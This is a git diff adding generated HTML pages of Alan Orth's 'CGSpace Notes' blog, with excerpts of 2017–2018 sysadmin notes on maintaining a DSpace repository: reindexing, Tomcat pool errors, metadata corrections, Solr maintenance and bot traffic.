+  <h2 id="2018-06-04">2018-06-04</h2>
+<ul>
+<li>Test the <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=560">DSpace 5.8 module upgrades from Atmire</a> (<a href="https://github.com/ilri/DSpace/pull/378">#378</a>)
+<ul>
+<li>There seems to be a problem with the CUA and L&amp;R versions in <code>pom.xml</code> because they are using SNAPSHOT and it doesn&rsquo;t build</li>
+</ul>
+</li>
+<li>I added the new CCAFS Phase II Project Tag <code>PII-FP1_PACCA2</code> and merged it into the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/379">#379</a>)</li>
+<li>I proofed and tested the ILRI author corrections that Peter sent back to me this week:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3 -n
+</code></pre><ul>
+<li>I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in <a href="/cgspace-notes/2018-03/">March, 2018</a></li>
+<li>Time to index ~70,000 items on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b                                  
+
+real    74m42.646s
+user    8m5.056s
+sys     2m7.289s
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-06/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-05/">May, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-05-01T16:43:54+03:00">Tue May 01, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-05-01">2018-05-01</h2>
+<ul>
+<li>I cleared the Solr statistics core on DSpace Test by issuing two commands directly to the Solr admin interface:
+<ul>
+<li>http://localhost:3000/solr/statistics/update?stream.body=%3Cdelete%3E%3Cquery%3E*:*%3C/query%3E%3C/delete%3E</li>
+<li>http://localhost:3000/solr/statistics/update?stream.body=%3Ccommit/%3E</li>
+</ul>
+</li>
+<li>Then I reduced the JVM heap size from 6144 back to 5120m</li>
+<li>Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure scripts</a> to support hosts choosing which distribution they want to use</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-05/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-04/">April, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-04-01T16:13:54+02:00">Sun Apr 01, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-04-01">2018-04-01</h2>
+<ul>
+<li>I tried to test something on DSpace Test but noticed that it&rsquo;s down since god knows when</li>
+<li>Catalina logs at least show some memory errors yesterday:</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-04/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-03/">March, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-03-02T16:07:54+02:00">Fri Mar 02, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-03-02">2018-03-02</h2>
+<ul>
+<li>Export a CSV of the IITA community metadata for Martin Mueller</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-03/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-02/">February, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-02-01T16:28:54+02:00">Thu Feb 01, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-02-01">2018-02-01</h2>
+<ul>
+<li>Peter gave feedback on the <code>dc.rights</code> proof of concept that I had sent him last week</li>
+<li>We don&rsquo;t need to distinguish between internal and external works, so that makes it just a simple list</li>
+<li>Yesterday I figured out how to monitor DSpace sessions using JMX</li>
+<li>I copied the logic in the <code>jmx_tomcat_dbpools</code> provided by Ubuntu&rsquo;s <code>munin-plugins-java</code> package and used the stuff I discovered about JMX <a href="/cgspace-notes/2018-01/">in 2018-01</a></li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-02/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-01/">January, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-01-02T08:35:54-08:00">Tue Jan 02, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-01-02">2018-01-02</h2>
+<ul>
+<li>Uptime Robot noticed that CGSpace went down and up a few times last night, for a few minutes each time</li>
+<li>I didn&rsquo;t get any load alerts from Linode and the REST and XMLUI logs don&rsquo;t show anything out of the ordinary</li>
+<li>The nginx logs show HTTP 200s until <code>02/Jan/2018:11:27:17 +0000</code> when Uptime Robot got an HTTP 500</li>
+<li>In dspace.log around that time I see many errors like &ldquo;Client closed the connection before file download was complete&rdquo;</li>
+<li>And just before that I see this:</li>
+</ul>
+<pre tabindex="0"><code>Caused by: org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-980] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:50; busy:50; idle:0; lastwait:5000].
+</code></pre><ul>
+<li>Ah hah! So the pool was actually empty!</li>
+<li>I need to increase that, let&rsquo;s try to bump it up from 50 to 75</li>
+<li>After that one client got an HTTP 499 but then the rest were HTTP 200, so I don&rsquo;t know what the hell Uptime Robot saw</li>
+<li>I notice this error quite a few times in dspace.log:</li>
+</ul>
+<pre tabindex="0"><code>2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
+org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976+TO+1979]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
+</code></pre><ul>
+<li>And there are many of these errors every day for the past month:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c &#34;Error while searching for sidebar facets&#34; dspace.log.*
+dspace.log.2017-11-21:4
+dspace.log.2017-11-22:1
+dspace.log.2017-11-23:4
+dspace.log.2017-11-24:11
+dspace.log.2017-11-25:0
+dspace.log.2017-11-26:1
+dspace.log.2017-11-27:7
+dspace.log.2017-11-28:21
+dspace.log.2017-11-29:31
+dspace.log.2017-11-30:15
+dspace.log.2017-12-01:15
+dspace.log.2017-12-02:20
+dspace.log.2017-12-03:38
+dspace.log.2017-12-04:65
+dspace.log.2017-12-05:43
+dspace.log.2017-12-06:72
+dspace.log.2017-12-07:27
+dspace.log.2017-12-08:15
+dspace.log.2017-12-09:29
+dspace.log.2017-12-10:35
+dspace.log.2017-12-11:20
+dspace.log.2017-12-12:44
+dspace.log.2017-12-13:36
+dspace.log.2017-12-14:59
+dspace.log.2017-12-15:104
+dspace.log.2017-12-16:53
+dspace.log.2017-12-17:66
+dspace.log.2017-12-18:83
+dspace.log.2017-12-19:101
+dspace.log.2017-12-20:74
+dspace.log.2017-12-21:55
+dspace.log.2017-12-22:66
+dspace.log.2017-12-23:50
+dspace.log.2017-12-24:85
+dspace.log.2017-12-25:62
+dspace.log.2017-12-26:49
+dspace.log.2017-12-27:30
+dspace.log.2017-12-28:54
+dspace.log.2017-12-29:68
+dspace.log.2017-12-30:89
+dspace.log.2017-12-31:53
+dspace.log.2018-01-01:45
+dspace.log.2018-01-02:34
+</code></pre><ul>
+<li>Danny wrote to ask for help renewing the wildcard ilri.org certificate and I advised that we should probably use Let&rsquo;s Encrypt if it&rsquo;s just a handful of domains</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-01/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-12/">December, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-12-01T13:53:54+03:00">Fri Dec 01, 2017</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2017-12-01">2017-12-01</h2>
+<ul>
+<li>Uptime Robot noticed that CGSpace went down</li>
+<li>The logs say &ldquo;Timeout waiting for idle object&rdquo;</li>
+<li>PostgreSQL activity says there are 115 connections currently</li>
+<li>The list of connections to XMLUI and REST API for today:</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2017-12/'>Read more →</a>
+</article> 
+
+
+
+
+
+<nav class="blog-pagination">
+  
+  <a class="btn btn-outline-primary" href="/cgspace-notes/posts/page/6/" rel="prev" role="button">Previous page</a>
+  <a class="btn btn-outline-primary" href="/cgspace-notes/posts/page/8/" rel="next" role="button">Next page</a>
+  
+  
+  
+</nav>
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/posts/page/8/index.html b/docs/posts/page/8/index.html
new file mode 100644
index 000000000..a0b109222
--- /dev/null
+++ b/docs/posts/page/8/index.html
@@ -0,0 +1,444 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="Posts" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/posts/" />
+<meta property="og:updated_time" content="2023-07-01T17:17:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="Posts"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "Blog",
+  "headline": "CGSpace Notes",
+  "url" : "https://alanorth.github.io/cgspace-notes/posts/",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "dateModified": "2023-07-01T17:14:36+03:00",
+  "keywords": "notes, migration, notes",
+  "description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
+}
+</script>
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/posts/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/posts/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-11/">November, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-11-02T09:37:54+02:00">Thu Nov 02, 2017</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2017-11-01">2017-11-01</h2>
+<ul>
+<li>The CORE developers responded to say they are looking into their bot not respecting our robots.txt</li>
+</ul>
+<h2 id="2017-11-02">2017-11-02</h2>
+<ul>
+<li>Today there have been no hits by CORE and no alerts from Linode (coincidence?)</li>
+</ul>
+<pre tabindex="0"><code># grep -c &#34;CORE&#34; /var/log/nginx/access.log
+0
+</code></pre><ul>
+<li>Generate list of authors on CGSpace for Peter to go through and correct:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
+COPY 54701
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2017-11/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-10/">October, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-10-01T08:07:54+03:00">Sun Oct 01, 2017</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2017-10-01">2017-10-01</h2>
+<ul>
+<li>Peter emailed to point out that many items in the <a href="https://cgspace.cgiar.org/handle/10568/2703">ILRI archive collection</a> have multiple handles:</li>
+</ul>
+<pre tabindex="0"><code>http://hdl.handle.net/10568/78495||http://hdl.handle.net/10568/79336
+</code></pre><ul>
+<li>There appears to be a pattern but I&rsquo;ll have to look a bit closer and try to clean them up automatically, either in SQL or in OpenRefine</li>
+<li>Add Katherine Lutz to the groups for content submission and edit steps of the CGIAR System collections</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2017-10/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/cgiar-library-migration/">CGIAR Library Migration</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-09-18T16:38:35+03:00">Mon Sep 18, 2017</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/migration/" rel="tag">Migration</a>
+
+</p>
+  </header>
+  <p>Rough notes for importing the CGIAR Library content. It was decided that this content would go to a new top-level community called <em>CGIAR System Organization</em>.</p>
+  <a href='https://alanorth.github.io/cgspace-notes/cgiar-library-migration/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-09/">September, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-09-07T16:54:52+07:00">Thu Sep 07, 2017</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2017-09-06">2017-09-06</h2>
+<ul>
+<li>Linode sent an alert that CGSpace (linode18) was using 261% CPU for the past two hours</li>
+</ul>
+<h2 id="2017-09-07">2017-09-07</h2>
+<ul>
+<li>Ask Sisay to clean up the WLE approvers a bit, as Marianne&rsquo;s user account is both in the approvers step as well as the group</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2017-09/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-08/">August, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-08-01T11:51:52+03:00">Tue Aug 01, 2017</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2017-08-01">2017-08-01</h2>
+<ul>
+<li>Linode sent an alert that CGSpace (linode18) was using 350% CPU for the past two hours</li>
+<li>I looked in the Activity pane of the Admin Control Panel and it seems that Google, Baidu, Yahoo, and Bing are all crawling with massive numbers of bots concurrently (~100 total, mostly Baidu and Google)</li>
+<li>The good thing is that, according to <code>dspace.log.2017-08-01</code>, they are all using the same Tomcat session</li>
+<li>This means our Tomcat Crawler Session Valve is working</li>
+<li>But many of the bots are browsing dynamic URLs like:
+<ul>
+<li>/handle/10568/3353/discover</li>
+<li>/handle/10568/16510/browse</li>
+</ul>
+</li>
+<li>The <code>robots.txt</code> only blocks the top-level <code>/discover</code> and <code>/browse</code> URLs&hellip; we will need to find a way to forbid them from accessing these!</li>
+<li>Relevant issue from DSpace Jira (semi resolved in DSpace 6.0): <a href="https://jira.duraspace.org/browse/DS-2962">https://jira.duraspace.org/browse/DS-2962</a></li>
+<li>It turns out that we&rsquo;re already adding the <code>X-Robots-Tag &quot;none&quot;</code> HTTP header, but this only forbids the search engine from <em>indexing</em> the page, not crawling it!</li>
+<li>Also, the bot has to successfully browse the page first so it can receive the HTTP header&hellip;</li>
+<li>We might actually have to <em>block</em> these requests with HTTP 403 depending on the user agent</li>
+<li>Abenet pointed out that the CGIAR Library Historical Archive collection I sent July 20th only had ~100 entries, instead of 2415</li>
+<li>This was due to newline characters in the <code>dc.description.abstract</code> column, which caused OpenRefine to choke when exporting the CSV</li>
+<li>I exported a new CSV from the collection on DSpace Test and then manually removed the characters in vim using <code>g/^$/d</code></li>
+<li>Then I cleaned up the author authorities and HTML characters in OpenRefine and sent the file back to Abenet</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2017-08/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-07/">July, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-07-01T18:03:52+03:00">Sat Jul 01, 2017</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2017-07-01">2017-07-01</h2>
+<ul>
+<li>Run system updates and reboot DSpace Test</li>
+</ul>
+<h2 id="2017-07-04">2017-07-04</h2>
+<ul>
+<li>Merge changes for WLE Phase II theme rename (<a href="https://github.com/ilri/DSpace/pull/329">#329</a>)</li>
+<li>Looking at extracting the metadata registries from ICARDA&rsquo;s MEL DSpace database so we can compare fields with CGSpace</li>
+<li>We can use PostgreSQL&rsquo;s extended output format (<code>-x</code>) plus <code>sed</code> to format the output into quasi XML:</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2017-07/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-06/">June, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-06-01T10:14:52+03:00">Thu Jun 01, 2017</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  2017-06-01 After discussion with WLE and CGSpace content people, we decided to just add one metadata field for the WLE Research Themes The cg.identifier.wletheme field will be used for both Phase I and Phase II Research Themes Then we&rsquo;ll create a new sub-community for Phase II and create collections for the research themes there The current &ldquo;Research Themes&rdquo; community will be renamed to &ldquo;WLE Phase I Research Themes&rdquo; Tagged all items in the current Phase I collections with their appropriate themes Create pull request to add Phase II research themes to the submission form: #328 Add cg.
+  <a href='https://alanorth.github.io/cgspace-notes/2017-06/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-05/">May, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-05-01T16:21:52+02:00">Mon May 01, 2017</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  2017-05-01 ICARDA apparently started working on CG Core on their MEL repository They have done a few cg.* fields, but not very consistent and even copy some of CGSpace items: https://mel.cgiar.org/xmlui/handle/20.500.11766/6911?show=full https://cgspace.cgiar.org/handle/10568/73683 2017-05-02 Atmire got back about the Workflow Statistics issue, and apparently it&rsquo;s a bug in the CUA module so they will send us a pull request 2017-05-04 Sync DSpace Test with database and assetstore from CGSpace Re-deploy DSpace Test with Atmire&rsquo;s CUA patch for workflow statistics, run system updates, and restart the server Now I can see the workflow statistics and am able to select users, but everything returns 0 items Megan says there are still some mapped items are not appearing since last week, so I forced a full index-discovery -b Need to remember to check if the collection has more items (currently 39 on CGSpace, but 118 on the freshly reindexed DSPace Test) tomorrow: https://cgspace.
+  <a href='https://alanorth.github.io/cgspace-notes/2017-05/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-04/">April, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-04-02T17:08:52+02:00">Sun Apr 02, 2017</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2017-04-02">2017-04-02</h2>
+<ul>
+<li>Merge one change to CCAFS flagships that I had forgotten to remove last month (&ldquo;MANAGING CLIMATE RISK&rdquo;): <a href="https://github.com/ilri/DSpace/pull/317">https://github.com/ilri/DSpace/pull/317</a></li>
+<li>Quick proof-of-concept hack to add <code>dc.rights</code> to the input form, including some inline instructions/hints:</li>
+</ul>
+<p><img src="/cgspace-notes/2017/04/dc-rights.png" alt="dc.rights in the submission form"></p>
+<ul>
+<li>Remove redundant/duplicate text in the DSpace submission license</li>
+<li>Testing the CMYK patch on a collection with 650 items:</li>
+</ul>
+<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2017-04/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-03/">March, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-03-01T17:08:52+02:00">Wed Mar 01, 2017</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2017-03-01">2017-03-01</h2>
+<ul>
+<li>Run the 279 CIAT author corrections on CGSpace</li>
+</ul>
+<h2 id="2017-03-02">2017-03-02</h2>
+<ul>
+<li>Skype with Michael and Peter, discussing moving the CGIAR Library to CGSpace</li>
+<li>CGIAR people possibly open to moving content, redirecting library.cgiar.org to CGSpace and letting CGSpace resolve their handles</li>
+<li>They might come in at the top level in one &ldquo;CGIAR System&rdquo; community, or with several communities</li>
+<li>I need to spend a bit of time looking at the multiple handle support in DSpace and see if new content can be minted in both handles, or just one?</li>
+<li>Need to send Peter and Michael some notes about this in a few days</li>
+<li>Also, need to consider talking to Atmire about hiring them to bring ORCiD metadata to REST / OAI</li>
+<li>Filed an issue on DSpace issue tracker for the <code>filter-media</code> bug that causes it to process JPGs even when limiting to the PDF thumbnail plugin: <a href="https://jira.duraspace.org/browse/DS-3516">DS-3516</a></li>
+<li>Discovered that the ImageMagic <code>filter-media</code> plugin creates JPG thumbnails with the CMYK colorspace when the source PDF is using CMYK</li>
+<li>Interestingly, it seems DSpace 4.x&rsquo;s thumbnails were sRGB, but forcing regeneration using DSpace 5.x&rsquo;s ImageMagick plugin creates CMYK JPGs if the source PDF was CMYK (see <a href="https://cgspace.cgiar.org/handle/10568/51999">10568/51999</a>):</li>
+</ul>
+<pre tabindex="0"><code>$ identify ~/Desktop/alc_contrastes_desafios.jpg
+/Users/aorth/Desktop/alc_contrastes_desafios.jpg JPEG 464x600 464x600+0+0 8-bit CMYK 168KB 0.000u 0:00.000
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2017-03/'>Read more →</a>
+</article> 
+
+
+
+
+
+<nav class="blog-pagination">
+  
+  <a class="btn btn-outline-primary" href="/cgspace-notes/posts/page/7/" rel="prev" role="button">Previous page</a>
+  <a class="btn btn-outline-primary" href="/cgspace-notes/posts/page/9/" rel="next" role="button">Next page</a>
+  
+  
+  
+</nav>
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/posts/page/9/index.html b/docs/posts/page/9/index.html
new file mode 100644
index 000000000..b2979f1a5
--- /dev/null
+++ b/docs/posts/page/9/index.html
@@ -0,0 +1,453 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="Posts" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
